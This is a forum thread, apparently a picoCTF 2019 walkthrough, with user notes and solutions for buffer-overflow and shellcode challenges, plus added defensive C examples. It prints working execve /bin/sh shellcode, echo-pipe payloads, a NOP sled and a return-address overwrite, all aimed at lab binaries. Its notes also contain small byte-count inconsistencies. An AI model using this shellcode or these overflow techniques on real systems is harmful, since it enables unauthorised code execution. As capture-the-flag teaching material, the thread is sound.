Video Tutorial picoCTF Walkthrough Writeup 2019


Rake

In this Linux Noob picoCTF 2019 Tutorial you will learn about buffer overflows and a lot more hacking techniques.

CTFs are a key and fundamental way to learn about the world of hacking. This picoCTF guide will walk you through and teach you the fundamentals of how to hack. Penetration testing skills can be honed and advanced using a CTF guide, and in this beginner CTF we will cover the infamous Buffer Overflow.

In the Cyber Security world a buffer overflow is when a piece of code written by a programmer has incorrectly allocated or programmed excess data while writing to a buffer. Buffers are areas of memory set to hold data, and in this picoCTF guide you will learn how to use programmers' poorly written code to your advantage. Buffer Overflows have been used by elite hackers such as nation states and black hat hackers all around the world since hacking began. These techniques have brought down governments and some of the biggest companies in the world. Learning these techniques will put you ahead of skid kiddies who do not apply themselves to a CTF tutorial and only look for the easy way.

In this picoCTF tutorial you will cover and learn concepts such as:

  • How to program shell code in C
  • How to use advanced system hacking techniques like elite nation state hackers
  • Fundamental penetration testing skills

Once you’ve completed this beginner's guide to CTF you will have a better understanding of how a computer system's memory works and how writing improper code can cause a serious breach of a system. Guided Hacking hopes you enjoy this picoCTF tutorial, and on completion of our picoCTF guide you can take your newfound knowledge of a buffer overflow and go on to create even more advanced hacking techniques in computer memory.

What is picoCTF?
picoCTF is a free computer security game targeted at middle and high school students, created by security experts at Carnegie Mellon University. The game consists of a series of challenges centered around a unique storyline where participants must reverse engineer, break, hack, decrypt, or do whatever it takes to solve the challenge. The challenges are all set up with the intent of being hacked, making it an excellent, legal way to get hands-on experience.

The 2019 competition was held between September 27, 2019 and October 11, 2019. Though the competition has ended this year, anyone 13 and older can play picoCTF 2019 or picoCTF 2018 year-round for fun and learning.

picoCTF - CMU Cybersecurity Competition

Wow, this CTF was much bigger and harder than I initially thought; this was gonna be a 2-part video and now it's 5 parts.


Video 2 Challenges:
  • open to admins
  • tapping
  • la cifra de
  • picobrowser
  • plumbing
  • slippery-shellcode
  • vault door 3
  • what's the difference
  • where is the file
In this picoCTF 2019 Writeup 2/3 Buffer Overflows tutorial you will learn the key and fundamental concepts of what it takes to engineer a buffer overflow attack on a Linux machine.

Using Windows Subsystem for Linux (WSL), this picoCTF will help you develop the understanding and know-how in one of the cyber security industry's most well-known attack methods. This attack method has been used by some of the most elite hackers in the world, such as nation state hackers, black hat hackers, and penetration testing security professionals. This beginner CTF is a great way to get yourself accustomed to WSL. Windows Subsystem for Linux is a layer within a Windows operating system that has compatibility with a Linux operating system.

During this picoCTF guide you will learn about key concepts of a Linux operating system computer and computer architecture that will give you a better and more refined understanding of how the low level aspect of a computer system works. This picoCTF tutorial is a great way for beginner CTF users to learn about how a buffer overflow works.

In this picoCTF guide you will learn the following concepts:

  • How a buffer overflow is written
  • How poor code can be used to hack an operating system
  • Windows Subsystem for Linux
  • Computer architecture of a buffer overflow
  • Elite and advanced penetration testing methods

After finishing this picoCTF tutorial you will have developed the key and fundamental knowledge about how to hack and be on your way to becoming a capture the flag master. All the knowledge provided in this picoCTF guide is used daily by elite hackers, and doing a picoCTF walkthrough is a great way to develop and hone those penetration testing skills quickly. Guided Hacking hopes you enjoy this picoCTF tutorial, and with the skills learned from our picoCTF walkthrough you can go on to develop even more advanced attack methods on your journey to becoming an elite hacker.


How to SSH into picoctf 2019:
ssh username@2019shell1.picoctf.com

Here are some useful links I used
Online x86 and x64 Intel Instruction Assembler
X86 Assembly/Interfacing with Linux - Wikibooks, open books for an open world
execve(2): execute program - Linux man page
ASCII to Hex - Free text conversion tools
PUSH — Push Word, Doubleword or Quadword Onto the Stack
Online Hex Converter - Bytes, Ints, Floats, Significance, Endians - SCADACore
Steganography Online
Convert octal to text - Converters
jsm28/bsd-games
RSA (cryptosystem) - Wikipedia

Here are a few solutions from the videos that you want

Handy shellcode

Code:
push  0x0068732f
push  0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
OverFlow 1
Code:
(echo -en "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\xe6\x85\x04\x08"; cat) | ./vuln
Slippery Shellcode
Code:
(echo -en "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
what's the difference
C++:
#include <iostream>
#include <fstream>
#include <vector>
#include <algorithm>

int main()
{
    // Read both images as raw bytes.
    std::ifstream fs1("cattos.jpg", std::ios::in | std::ios::binary);
    std::ifstream fs2("kitters.jpg", std::ios::in | std::ios::binary);
    if (!fs1 || !fs2)
    {
        std::cerr << "could not open input files" << std::endl;
        return 1;
    }

    std::vector<char> fsa((std::istreambuf_iterator<char>(fs1)), std::istreambuf_iterator<char>());
    std::vector<char> fsb((std::istreambuf_iterator<char>(fs2)), std::istreambuf_iterator<char>());

    // Only walk the overlapping range so a shorter second file is never read out of bounds.
    const std::size_t n = std::min(fsa.size(), fsb.size());
    for (std::size_t i = 0; i < n; i++)
    {
        // Every byte that differs is one character of the flag hidden in the first image.
        if (fsa[i] != fsb[i])
        {
            std::cout << fsa[i];
        }
    }
    std::cout << std::endl;
    return 0;
}
vault door 3
C++:
#include <iostream>

// The scrambled string the vault compares against; Decode() undoes the vault's permutation.
const char hash[] = "jU5t_a_sna_3lpm13gc49_u_4_m0rf41";

// 32 password characters plus a terminating NUL so it can be printed as a C string.
char password[33]{ 0 };

void Decode(const char* input, char* output)
{
    // Odd positions 17..31 are left in place by the vault.
    for (int i = 31; i >= 17; i -= 2)
    {
        output[i] = input[i];
    }

    // Even positions 16..30 are mirrored around index 23.
    for (int i = 16; i < 32; i += 2)
    {
        output[i] = input[46 - i];
    }

    // Positions 8..15 are reversed.
    for (int i = 8; i < 16; i++)
    {
        output[i] = input[23 - i];
    }

    // The first 8 characters are unchanged.
    for (int i = 0; i < 8; i++)
    {
        output[i] = input[i];
    }
}

int main()
{
    Decode(hash, password);

    std::cout << password << std::endl;

    return 0;
}
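The OverFlow 1 payload above only works because the program copies a line into a 64-byte buffer with no bound and the saved return address sits 76 bytes into the frame (those two offsets are the ones the notes later in this thread arrive at). The C below is an added illustration for this page, not the challenge source and not Rake's code: it models that frame layout as a struct, copies a constructed copy of the 80-byte payload into it the way an unbounded gets()-style read would, and shows the return address becoming 0x080485e6; beside it is the bounded read that fgets()-style code gives you, which stores at most 63 bytes and leaves the return address alone. The struct layout and all function names are my own model, not the real binary's frame.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Frame model for OverFlow 1 as described in the thread's notes: a 64-byte input buffer,
 * then 12 bytes (padding and the saved frame pointer), then the 4-byte return address at
 * offset 76. This is an illustrative model of the layout, not the real binary's frame. */
#define BUFSIZE    64
#define RET_OFFSET 76

struct frame {
    char          buf[BUFSIZE];
    unsigned char gap[RET_OFFSET - BUFSIZE];
    unsigned char ret[4];
    unsigned char guard[16];   /* slack so the simulation itself never writes out of bounds */
};

/* Constructed copy of the post's payload: 76 'a' bytes, 0x080485e6 little-endian, and the
 * NUL that a gets()-style read appends, 81 bytes in total. */
#define PAYLOAD_LEN 81
void build_payload(unsigned char out[PAYLOAD_LEN])
{
    memset(out, 'a', 76);
    out[76] = 0xE6; out[77] = 0x85; out[78] = 0x04; out[79] = 0x08;
    out[80] = '\0';
}

/* Read the 4 return-address bytes back as the little-endian value the CPU would use. */
uint32_t ret_value(const struct frame *f)
{
    return (uint32_t)f->ret[0] | (uint32_t)f->ret[1] << 8
         | (uint32_t)f->ret[2] << 16 | (uint32_t)f->ret[3] << 24;
}

/* Unbounded read: every byte of the line, terminator included, is stored regardless of the
 * buffer size. That is gets() behaviour; it is modelled with memcpy onto the frame bytes so
 * the demonstration itself stays well-defined C. */
uint32_t simulate_unbounded(void)
{
    struct frame f;
    unsigned char payload[PAYLOAD_LEN];
    memset(&f, 0, sizeof f);
    build_payload(payload);
    memcpy(&f, payload, PAYLOAD_LEN);      /* 81 bytes land in a 64-byte buffer */
    return ret_value(&f);                  /* 0x080485e6: flag() runs when the function returns */
}

/* Bounded read: at most cap-1 bytes are stored, input stops at a newline, and the result is
 * always NUL-terminated. Returns the number of bytes stored. This is the fgets(buf, sizeof buf,
 * stdin) discipline, written over a byte string so it can run without stdin. */
size_t bounded_read_line(char *dst, size_t cap, const unsigned char *src, size_t srclen)
{
    size_t n = 0;
    if (cap == 0) return 0;
    while (n < cap - 1 && n < srclen && src[n] != '\n') {
        dst[n] = (char)src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Same payload through the bounded read: the return address stays 0. */
uint32_t simulate_bounded(void)
{
    struct frame f;
    unsigned char payload[PAYLOAD_LEN];
    memset(&f, 0, sizeof f);
    build_payload(payload);
    bounded_read_line(f.buf, sizeof f.buf, payload, 80);   /* the 80 payload bytes, no NUL */
    return ret_value(&f);
}

/* How many bytes the bounded read keeps from the 80-byte payload: 63, plus the NUL. */
size_t simulate_bounded_len(void)
{
    struct frame f;
    unsigned char payload[PAYLOAD_LEN];
    memset(&f, 0, sizeof f);
    build_payload(payload);
    return bounded_read_line(f.buf, sizeof f.buf, payload, 80);
}

int main(void)
{
    printf("unbounded read: return address = 0x%08x\n", simulate_unbounded());
    printf("bounded read:   return address = 0x%08x, %zu bytes stored\n",
           simulate_bounded(), simulate_bounded_len());
    return 0;
}
```

The point of the side-by-side is that nothing about the payload changes between the two runs; only the read discipline does, and that alone decides whether the saved return address is reachable from input.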
 

mambda

It's a nice idea, we've tried it before, people don't participate.
 

Meanjellybean

Well, I would be willing to give it a try. Put some of my IDA Pro skills and cpp codes to use.
👍
This year is over. But maybe 2020?
 

Rake

I created a team, PM for password if you're kewl, can only have 5 peeps on the team I guess
 

Rake

Random video notes

/problems/handy-shellcode_5_d1b3658f284f442eac06607b8ac4d1f5
so the easiest way to do this is to spawn a shell that has permissions to open the file

We want to execute a system call which calls sys_execve

The easiest way to do that is by calling the execve Linux syscall and having it execute /bin/sh
The assembly code to do this looks like this:
https://defuse.ca/online-x86-assembler.htm#disassembly
push 0x0068732f
push 0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80"

We will break it down one line at a time

/bin/sh

int 0x80 is the syscall interrupt

call execve
which syscall number is execve:
get the syscall number

https://syscalls.kernelgrok.com/
0xB or 11

int execve(const char *filename, char *const argv[], char *const envp[]);
so there are 3 arguments, the first one is path of the file we want to execute, the second 2 don't matter for our needs, we don't need shell arguments or environment variables set

So we need to write some assembly that calls the execve syscall, which will execute /bin/sh. We need to know the calling convention for syscalls

SysCall#  Param 1  Param 2  Param 3  Param 4  Param 5  Param 6
eax       ebx      ecx      edx      esi      edi      ebp

Return value
eax

Our function only has 3 parameters, and the second 2 are optional so we will just set them to 0.

The first argument needs to be a pointer to the /bin/sh string, the easiest thing to do is make this string a local variable on the stack

https://www.felixcloutier.com/x86/push
We want to push an immediate 32 bit value, which is opcode 68
The push instruction is a 5 byte instruction, 1 byte is the opcode and the other 4 are the bytes we're pushing

So first we push the "/bin/sh" string
The string we need is "/bin/sh" with a null terminator

this string in hex is 2f 62 69 6e 2f 73 68 00, this is 8 bytes including the null terminator so we can do it with 2 pushes.

this has to be done in reverse (this includes the null terminator)

push 0x68732f00 = 68 2F736800
push 0x6e69622f = 68 2F62696E

The first parameter of the syscall goes into EBX, so we want a pointer to our string to be in there, so we simply move the stack pointer there, because it points to the last var on the stack
mov ebx, esp = 8B DC

the next 2 arguments we said would be null, so we mov 0 into ecx and edx

mov ecx, 0 = B9 00000000
mov edx, 0 = BA 00000000

then we need to move the syscall number into eax
mov eax, b = B8 0B000000

now to execute the syscall we use interrupt 0x80
int 0x80 = CD 80

but just this alone will cause a segmentation fault

we need to call sysexit to prevent this, so we do a syscall using 1 which is the # for sys_exit
mov eax, 1 = B8 01000000
int 80 = CD 80

All these instructions combined look like this:
push 0x0068732f
push 0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

So if you take all these bytes and combine them into a string literal you get the following; the \x tells it to interpret each byte as a hex literal

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"

You'll see I added a \n
thank you @HACKEDHACKER
The reason we need the \n new line char is because puts() is waiting for you to finish inputting. If you don't put the \n the code still works, you just have to hit enter for it to continue executing.

./vuln

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"

or:
PERFECT
(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

OverFlow 1
64 chars
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
gdb ./vuln

(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

we're jumping to 0x8048705 !

gdb vuln

p flag
0x80485e6 = this is the address of the function we want to call
we want to change the return address to this address by overflowing the buffer

b vuln
Breakpoint 1 at 0x8048663

b flag
Breakpoint 2 at 0x80485ea (now we know what address we want to execute)

b get_return_address
0x8048714
then run

look at it in IDA, more accurate addresses
74
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

75 overwrites the first byte, with a 0 which is a null terminator
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

76 overwrites only 1 byte which is the null terminator
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

77 null terminator + 1 'a' byte 'a' = 0x61
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

78 null terminator plus 2 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

79 null terminator plus 3 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

80 null term plus 4 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

so now we have overwritten the full return address, which is 4 bytes. so now we remove our last 4 bytes and replace it with the return address we want
flag() = 0x080485E6

Little Endian
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaE6 85 04 08

picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)}

kyoto japan
odessa ukraine
dayton ohio USA
istanbul turkey
Abu Dhabi, UAE
Kuala Lumpur Malaysia
Addis Ababa, Ethiopia
Loja Ecuador
amsterdam netherlands
Sleepy Hollow new york USA
kodiak alaska, USA
Alexandria Egypt

slippery-shellcode

original:
(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

#define BUFSIZE 512
#define FLAGSIZE 128

the buffer is 512 bytes so let's put our shellcode at the end, our shellcode is 17 bytes so let's write 454 bytes and then our shellcode
So if the address that gets called is anywhere in the buffer before our shellcode, it'll just hit nops until it executes the shellcode

new

(echo -en "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
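To check what a byte string like the ones in these notes actually does without running it, here is a small decoder I am adding for this page; it is not Rake's code and not part of picoCTF. It knows only the encodings the notes walk through (68 imm32 push, 89 E3 mov ebx, esp, B8+r imm32 mov r32, imm32, CD imm8 int, and 90 nop) and reports anything else as a raw byte. On the handy-shellcode bytes it reproduces the instruction listing above and rebuilds the "/bin/sh" string the two pushes leave on the stack; on a slippery-shellcode style payload it also measures the nop sled before the first real instruction. The payload bytes in the block are constructed copies of the ones in the notes, the 454-byte sled and 512-byte buffer are the figures from the notes, and all type and function names are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed copy of the 29 handy-shellcode bytes from the notes (without the trailing \n). */
static const unsigned char HANDY[] = {
    0x68, 0x2F, 0x73, 0x68, 0x00,   /* push 0x0068732f  ("/sh\0") */
    0x68, 0x2F, 0x62, 0x69, 0x6E,   /* push 0x6e69622f  ("/bin")  */
    0x89, 0xE3,                     /* mov ebx, esp */
    0xB9, 0x00, 0x00, 0x00, 0x00,   /* mov ecx, 0 */
    0xBA, 0x00, 0x00, 0x00, 0x00,   /* mov edx, 0 */
    0xB8, 0x0B, 0x00, 0x00, 0x00,   /* mov eax, 0xb */
    0xCD, 0x80                      /* int 0x80 */
};

#define MAX_INSNS 16

typedef struct {
    size_t offset;      /* byte offset of the instruction in the payload */
    size_t length;      /* encoded length */
    char   text[40];    /* decoded mnemonic */
} insn_t;

typedef struct {
    size_t   sled;              /* leading 0x90 bytes before the first other instruction */
    size_t   ninsn;
    insn_t   insns[MAX_INSNS];
    char     stack_string[17];  /* what the pushes leave on the stack, in memory order */
    uint32_t eax;               /* last immediate loaded into eax: the syscall number */
    int      saw_int80;         /* payload performs int 0x80 */
} report_t;

static const char *REG32[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode only the encodings the notes use; any other byte is reported raw as "db". */
int decode_payload(const unsigned char *buf, size_t len, report_t *r)
{
    const unsigned char *pushed[4];
    size_t npush = 0, i = 0, pos = 0;

    memset(r, 0, sizeof *r);
    while (i < len && buf[i] == 0x90) i++;        /* nop sled */
    r->sled = i;

    while (i < len && r->ninsn < MAX_INSNS) {
        insn_t *in = &r->insns[r->ninsn++];
        unsigned char op = buf[i];
        in->offset = i;
        if (op == 0x68 && i + 5 <= len) {                             /* 68 imm32: push imm32 */
            snprintf(in->text, sizeof in->text, "push 0x%08x", le32(buf + i + 1));
            if (npush < 4) pushed[npush++] = buf + i + 1;
            in->length = 5;
        } else if (op == 0x89 && i + 2 <= len && buf[i + 1] == 0xE3) { /* 89 E3: mov ebx, esp */
            snprintf(in->text, sizeof in->text, "mov ebx, esp");
            in->length = 2;
        } else if (op >= 0xB8 && op <= 0xBF && i + 5 <= len) {        /* B8+r imm32: mov r32, imm32 */
            uint32_t imm = le32(buf + i + 1);
            snprintf(in->text, sizeof in->text, "mov %s, 0x%x", REG32[op - 0xB8], imm);
            if (op == 0xB8) r->eax = imm;
            in->length = 5;
        } else if (op == 0xCD && i + 2 <= len) {                      /* CD imm8: int imm8 */
            snprintf(in->text, sizeof in->text, "int 0x%02x", buf[i + 1]);
            if (buf[i + 1] == 0x80) r->saw_int80 = 1;
            in->length = 2;
        } else if (op == 0x90) {
            snprintf(in->text, sizeof in->text, "nop");
            in->length = 1;
        } else {
            snprintf(in->text, sizeof in->text, "db 0x%02x", op);
            in->length = 1;
        }
        i += in->length;
    }
    /* The stack grows downwards, so the last push sits lowest: rebuild the bytes in memory order. */
    while (npush > 0 && pos + 4 < sizeof r->stack_string) {
        memcpy(r->stack_string + pos, pushed[--npush], 4);
        pos += 4;
    }
    r->stack_string[pos] = '\0';
    return (int)r->ninsn;
}

static report_t g_report;

/* Decode the handy-shellcode bytes on their own. */
report_t *analyze_handy(void)
{
    decode_payload(HANDY, sizeof HANDY, &g_report);
    return &g_report;
}

/* Decode a slippery-shellcode style payload: nops 0x90 bytes, then the handy shellcode. */
report_t *analyze_slippery(size_t nops)
{
    static unsigned char buf[512];                 /* BUFSIZE from the notes */
    if (nops + sizeof HANDY > sizeof buf) return NULL;
    memset(buf, 0x90, nops);
    memcpy(buf + nops, HANDY, sizeof HANDY);
    decode_payload(buf, nops + sizeof HANDY, &g_report);
    return &g_report;
}

int main(void)
{
    report_t *r = analyze_slippery(454);
    printf("nop sled %zu bytes, %zu instructions, eax=0x%x, int 0x80=%s, stack string=\"%s\"\n",
           r->sled, r->ninsn, r->eax, r->saw_int80 ? "yes" : "no", r->stack_string);
    for (size_t k = 0; k < r->ninsn; k++)
        printf("  +%-4zu %s\n", r->insns[k].offset, r->insns[k].text);
    return 0;
}
```

Reading the report is quicker than reading the hex: eax ends at 0xb with an int 0x80 behind it and ebx points at "/bin/sh", which is the execve(2) call the notes build up step by step, and the sled length tells you how large a range of landing addresses the payload tolerates.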
 

Rake

Wow this got much harder in the second half, I'm having fun but some of these challenges are making me lose my mind
 

Rake

video 3 premiering soon

This is our last CTF video, I will not be making any more. They are the worst performing videos I have ever published and therefore a complete waste of time.
 
